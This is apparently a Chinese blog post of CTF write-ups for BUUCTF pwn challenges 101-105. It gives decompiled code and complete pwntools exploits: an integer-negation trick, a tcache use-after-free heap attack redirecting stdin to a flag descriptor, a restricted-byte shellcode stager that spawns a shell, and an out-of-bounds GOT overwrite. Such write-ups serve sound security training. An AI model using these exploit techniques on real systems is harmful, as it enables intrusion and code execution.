BUUCTF pwn wp 101 - 105

最新推荐文章于 2024-06-25 15:48:47 发布
最新推荐文章于 2024-06-25 15:48:47 发布
阅读量367 收藏
点赞数 1
分类专栏: PWN 文章标签: linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/123110405
版权

wustctf2020_number_game

wustctf2020_number_game(master*)$ file wustctf2020_number_game;checksec wustctf2020_number_game
wustctf2020_number_game: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ad95bd0bc056d1f68fc74a2a3f2cd7ce63ada796, not stripped
[*] '/home/pwn/桌面/wustctf2020_number_game/wustctf2020_number_game'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

unsigned int vulnerable()
{
  int v1; // [esp+8h] [ebp-10h] BYREF
  unsigned int v2; // [esp+Ch] [ebp-Ch]

  v2 = __readgsdword(0x14u);
  v1 = 0;
  __isoc99_scanf("%d", &v1);
  if ( v1 >= 0 || (v1 = -v1, v1 >= 0) )
    printf("You lose");
  else
    shell();
  return __readgsdword(0x14u) ^ v2;
}

有符号数的奇妙冒险, 首先不能是非零数, 输入一个负数, 之后这个负数取补码之后依然是负数
只有一个可能: 0x80000000

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 28729
filename = "./wustctf2020_number_game"
elf = ELF(filename)
# libc = ELF("./libc_x86-2.23.so")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

local = 0
if local:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-v']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    io.send('-2147483648')


if __name__ == "__main__":
    pwn()
    io.interactive()

ciscn_2019_final_2

ciscn_2019_final_2(master*)$ file ciscn_final_2;checksec ciscn_final_2 
ciscn_final_2: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=034de8edf01bcf16b3a78c825a5b23008331115d, not stripped
[*] '/home/pwn/桌面/ciscn_2019_final_2/ciscn_final_2'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // eax

  init(argc, argv, envp);
  Sandbox_Loading();
  while ( 1 )
  {
    while ( 1 )
    {
      menu();
      v3 = get_atoi();
      if ( v3 != 2 )
        break;
      delete();
    }
    if ( v3 > 2 )
    {
      if ( v3 == 3 )
      {
        show();
      }
      else if ( v3 == 4 )
      {
        bye_bye();
      }
    }
    else if ( v3 == 1 )
    {
      allocate();
    }
  }
}

sandbox

ciscn_2019_final_2(master*)$ seccomp-tools dump ./ciscn_final_2
 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x05 0xc000003e  if (A != ARCH_X86_64) goto 0007
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x02 0xffffffff  if (A != 0xffffffff) goto 0007
 0005: 0x15 0x01 0x00 0x0000003b  if (A == execve) goto 0007
 0006: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0007: 0x06 0x00 0x00 0x00000000  return KILL

什么都不准用, 有点意思了

init 读取flag到FILE结构(堆中), 然后修改fd为666

unsigned __int64 init()
{
  int fd; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  fd = open("flag", 0);
  if ( fd == -1 )
  {
    puts("no such file :flag");
    exit(-1);
  }
  dup2(fd, 666);
  close(fd);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  alarm(0x3Cu);
  return __readfsqword(0x28u) ^ v2;
}

allocate

unsigned __int64 allocate()
{
  _DWORD *v0; // rbx
  int v2; // [rsp+4h] [rbp-1Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-18h]

  v3 = __readfsqword(0x28u);
  printf("TYPE:\n1: int\n2: short int\n>");
  v2 = get_atoi();
  if ( v2 == 1 )
  {
    int_pt = malloc(0x20uLL);
    if ( !int_pt )
      exit(-1);
    bool = 1;
    printf("your inode number:");
    v0 = int_pt;
    *v0 = get_atoi();
    *((_DWORD *)int_pt + 2) = *(_DWORD *)int_pt;
    puts("add success !");
  }
  if ( v2 == 2 )
  {
    short_pt = malloc(0x10uLL);
    if ( !short_pt )
      exit(-1);
    bool = 1;
    printf("your inode number:");
    *(_WORD *)short_pt = get_atoi();
    *((_WORD *)short_pt + 4) = *(_WORD *)short_pt;
    puts("add success !");
  }
  return __readfsqword(0x28u) ^ v3;
}

delete 存在UAF

unsigned __int64 delete()
{
  int v1; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  if ( bool )
  {
    printf("TYPE:\n1: int\n2: short int\n>");
    v1 = get_atoi();
    if ( v1 == 1 && int_pt )
    {
      free(int_pt);
      bool = 0;
      puts("remove success !");
    }
    if ( v1 == 2 && short_pt )
    {
      free(short_pt);
      bool = 0;
      puts("remove success !");
    }
  }
  else
  {
    puts("invalid !");
  }
  return __readfsqword(0x28u) ^ v2;
}

byebye 可以劫持scanf的fd文件描述符到666

void __noreturn bye_bye()
{
  char v0[104]; // [rsp+0h] [rbp-70h] BYREF
  unsigned __int64 v1; // [rsp+68h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  puts("what do you want to say at last? ");
  __isoc99_scanf("%99s", v0);
  printf("your message :%s we have received...\n", v0);
  puts("have fun !");
  exit(0);
}

漏洞利用
堆利用打_IO_2_1_stdin_的结构体, 文件描述符修改到flag对应的fd == 666, 读取后即可打印出来

(1) tcache UAF 泄露堆
(2) 填满 tcache 用 unsorted bin attack 泄露 libc
(3) tcache attack 打 stdin_filno

在这里插入图片描述
add(2, heap_low_addr - 0xa0)
在这里插入图片描述

填满tcache
在这里插入图片描述
打stdin_filno
在这里插入图片描述
在这里插入图片描述

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 27097
filename = "./ciscn_final_2"
elf = ELF(filename)
libc = ELF("./libc_x64-2.27.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level="debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-v']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def add(type, number):
   io.sendlineafter('which command?', '1')
   io.sendlineafter('TYPE:', str(type))
   io.sendlineafter('your inode number:', str(number))
 
def delete(type):
   io.sendlineafter('which command?', '2')
   io.sendlineafter('TYPE:', str(type))
 
def show(type):
   io.sendlineafter('which command?', '3')
   io.sendlineafter('TYPE:', str(type))

def leave(content):
    io.sendlineafter('> ','4')
    io.sendlineafter('what do you want to say at last? \n', content)

def pwn():
    add(1, 0xfa1c4) # 0x30 chunk
    delete(1)
    for i in range(4):
        add(2, 0xfa1ca) # 0x20 chunks
    # B()
    delete(2)
    add(1, 0xfa1c4) # 0x30 chunk
    delete(2)
    show(2)
    io.recvuntil('your short type inode number :')
    heap_low_addr = int(io.recvuntil('\n')[:-1])
    if heap_low_addr < 0: heap_low_addr += 0x10000
    log.info('heap low address 2 bytes: %#x', heap_low_addr)
    add(2, heap_low_addr - 0xa0)
    add(2, 0)
    # B()
    delete(1)
    # B()
    add(2, 0x30 + 0x20 * 3 + 1) # fake chunk recall
    # B()
    for i in range(7):
        delete(1)
        add(2, 0)
    # B()
    delete(1)
    show(1)
    io.recvuntil('your int type inode number :')
    main_arena_low_4bytes = int(io.recvuntil('\n')[:-1]) - 96
    if main_arena_low_4bytes < 0: main_arena_low_4bytes += 0x100000000
    log.info('main arena low 4 bytes address: %#x', main_arena_low_4bytes)

    malloc_hook_low_4bytes = (main_arena_low_4bytes & 0xFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
    libc_base_low_4bytes = malloc_hook_low_4bytes - libc.sym['__malloc_hook']
    stdin_filno_low_4bytes = libc_base_low_4bytes + libc.sym['_IO_2_1_stdin_'] + 0x70
    log.info('libc base low 4 bytes address: %#x', libc_base_low_4bytes)
    log.info('stdin filno low 4byte: %#x', stdin_filno_low_4bytes)

    add(2, stdin_filno_low_4bytes & 0xFFFF)
    add(1, 0)
    # B()
    add(1, 666)
    leave('falca')
    

if __name__ == "__main__":
    pwn()
    io.interactive()

小结
unsorted bin attack + tcache UAF(double free) + house of spirit

wustctf2020_easyfast

做过了
https://blog.csdn.net/qq_33976344/article/details/120132888

starctf_2019_babyshell

starctf_2019_babyshell$ file starctf_2019_babyshell;checksec starctf_2019_babyshell
starctf_2019_babyshell: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=1823c3a487a33936129f5630bc72aae96a129ca8, stripped
[*] '/home/pwn/桌面/starctf_2019_babyshell/starctf_2019_babyshell'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  void *buf; // [rsp+0h] [rbp-10h]

  sub_4007F8(a1, a2, a3);
  buf = mmap(0LL, 0x1000uLL, 7, 34, 0, 0LL);
  puts("give me shellcode, plz:");
  read(0, buf, 0x200uLL);
  if ( !(unsigned int)sub_400786(buf) )
  {
    printf("wrong shellcode!");
    exit(0);
  }
  ((void (*)(void))buf)();
  return 0LL;
}

__int64 __fastcall sub_400786(_BYTE *a1)
{
  _BYTE *i; // [rsp+18h] [rbp-10h]

  while ( *a1 )
  {
    for ( i = &unk_400978; *i && *i != *a1; ++i )
      ;
    if ( !*i )
      return 0LL;
    ++a1;
  }
  return 1LL;
}

在这里插入图片描述
这里可以将数据转换成代码(按C + force)

在这里插入图片描述
这题是检查shellcode是否有匹配的指令, 由在这段代码中存在的指令组成的shellcode才能通过检查
所以可以分两步, 手写shellcode(由上方的指令集组成), 构造读取另一个shellcode的函数功能, 读取第二个shellcode到buf, 然后就可以执行buf的shellcode, get shell
64位系统, 可以采用syscall调用sys_read

在这里插入图片描述
看看检查函数上方的汇编
在这里插入图片描述
rsi = buf, 所以shellcode只需要控制rdi = 0, rdx = 合适的size即可
看看栈内有无可以利用的数据

断点到调用buf执行
在这里插入图片描述

在这里插入图片描述

shellcode = 'pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdx;pop rdi;syscall'

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 26060
filename = "./starctf_2019_babyshell"
elf = ELF(filename)
# libc = ELF("./libc64-2.23.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    shellcode = asm('pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdx;pop rdi;syscall')
    # B()
    io.sendafter('give me shellcode, plz:\n', shellcode)
    offset = 0xC
    io.sendline(cyclic(offset) + asm(shellcraft.sh()))


if __name__ == "__main__":
    pwn()
    io.interactive()

wustctf2020_name_your_dog

wustctf2020_name_your_dog$ file wustctf2020_name_your_dog;checksec wustctf2020_name_your_dog
wustctf2020_name_your_dog: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9615fb1408f3d1f6091c2018310bf9170bc6abd0, not stripped
[*] '/home/pwn/桌面/wustctf2020_name_your_dog/wustctf2020_name_your_dog'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

int vulnerable()
{
  int result; // eax
  int i; // [esp+8h] [ebp-10h]
  int v2; // [esp+Ch] [ebp-Ch]

  result = puts("I bought you five male dogs.Name for them?");
  for ( i = 1; i <= 5; ++i )
  {
    v2 = NameWhich(&Dogs);
    printf("You get %d dogs!!!!!!\nWhatever , the author prefers cats ^.^\n", i);
    result = printf("His name is:%s\n\n", (const char *)(8 * v2 + 134520928));
  }
  return result;
}

int __cdecl NameWhich(int a1)
{
  int v2[4]; // [esp+18h] [ebp-10h] BYREF

  v2[1] = __readgsdword(0x14u);
  printf("Name for which?\n>");
  __isoc99_scanf("%d", v2);
  printf("Give your name plz: ");
  __isoc99_scanf("%7s", 8 * v2[0] + a1);
  return v2[0];
}

数组越界漏洞, 越界到got, 劫持printf@got到shell后门函数即可, 但是发现偏移非整数所以修改scanf@got

在这里插入图片描述

在这里插入图片描述

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 27098
filename = "./wustctf2020_name_your_dog"
elf = ELF(filename)
# libc = ELF("./")
# context(arch="amd64", os="linux")
context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    shell_addr = 0x080485CB
    # offset = (0x0804A00C - 0x0804A060) / 8
    # print(offset) # -10.5 not integer
    offset = (0x0804A028 - 0x0804A060) / 8
    print(offset) # -7
    offset = int(offset)
    io.sendlineafter('>', str(offset))
    io.sendafter('name plz: ', p32(shell_addr))


if __name__ == "__main__":
    pwn()
    io.interactive()
fa1c4
关注
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2557
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2075
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF pwn wp 96 - 100
fa1c4的blog
02-23 739
axb_2019_heap axb_2019_heap(master*)$ file axb_2019_heap;checksec axb_2019_heap axb_2019_heap: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=bdd2a0e3
PWN练习---Stack_1
最新发布
qq_74259765的博客
06-25 1357
ctf--PWN方向一些做题经历wp
BUUCTF pwn wp 146 - 150
fa1c4的blog
04-30 589
hitcontraining_playfmt gwctf_2019_easy_pwn bctf2016_bcloud asis2016_b00ks warmup
BUUCTF pwn wp 141 - 145
fa1c4的blog
04-29 519
ciscn_2019_n_7 qctf_2018_stack2 falca@Ubuntu-2000:~/Desktop/qctf_2018_stack2$ file QCTF_2018_stack2;checksec QCTF_2018_stack2 QCTF_2018_stack2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.
BUUCTF pwn wp 111 - 115
fa1c4的blog
03-03 402
judgement_mna_2016 actf_2019_babyheap gyctf_2020_signin wdb_2018_3rd_soEasy gyctf_2020_some_thing_interesting
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1772
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 432
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
BUUCTF-PWN刷题记录-4
weixin_44145820的博客
04-10 1096
目录hitcontraining_secretgarden hitcontraining_secretgarden 这题需要使用double free size字段的高四位可以不为0
BUUCTF pwn wp 71 - 75
fa1c4的blog
11-16 591
ciscn_2019_final_3 picoctf_2018_shellcode jarvisoj_level5 npuctf_2020_easyheap hitcontraining_bamboobox
BUUCTF pwn wp 131 - 135
fa1c4的blog
04-27 594
rootersctf_2019_srop ciscn_2019_s_6 sctf_2019_easy_heap de1ctf_2019_weapon SWPUCTF_2019_p1KkHeap
BUUCTFPWN(WP1)
NANMUZN的博客
01-15 683
buuctf pwn
BUUCTF pwn wp 26 - 30
fa1c4的blog
09-27 277
ciscn_2019_s_3 只有read和write, 用SROP打 srop漏洞 参考https://www.anquanke.com/post/id/217081 https://blog.csdn.net/qq_33976344/article/details/115787451 需要注意一下调用方式, 返回直接retn, 所以不弹rbp, 直接弹ret_addr, 另外需要一个gadget设置rax, 程序里是直接提供了的 from pwn import * url, port = 'n
BUUCTF pwn wp 16 - 20
fa1c4的blog
08-24 533
[HarekazeCTF2019]baby_rop int __cdecl main(int argc, const char **argv, const char **envp) { char v4[16]; // [rsp+0h] [rbp-10h] BYREF system("echo -n \"What's your name? \""); __isoc99_scanf("%s", v4); printf("Welcome to the Pwn World, %s!\n", v4
BUUCTFPWN(WP2)
NANMUZN的博客
03-08 183
嘻嘻
BUUCTF笔记之Pwn部分WP
克格莫(有需要的私信)
06-07 403
二进制是我的弱项,这里记录一些简单的pwn题。 1.test_your_nc
buuctf pwn wp(第1.5波)学会用ELF语句进行AAAA(即本地做题目)
月阴荒的博客
03-24 591
这里是一个总的分类,一个类型的第一道题目会详细介绍,后面的类型相同的会简略介绍(不过这是第二波,额还是很简单的,原理可以看我前面的文章,后面难一点的题目我再讲原理。) 这一波题都是无脑AAAA的类型,它们的区别主要就是打入多少个填充字符A的区别,(还有接受到什么字符串的区别),反正都是最简单的一类题。 另外声明,脚本有些来自于网络上(太简单的不想多看,太难的不会,除了中间那一档的也没哪些脚本是自己...
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1637
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值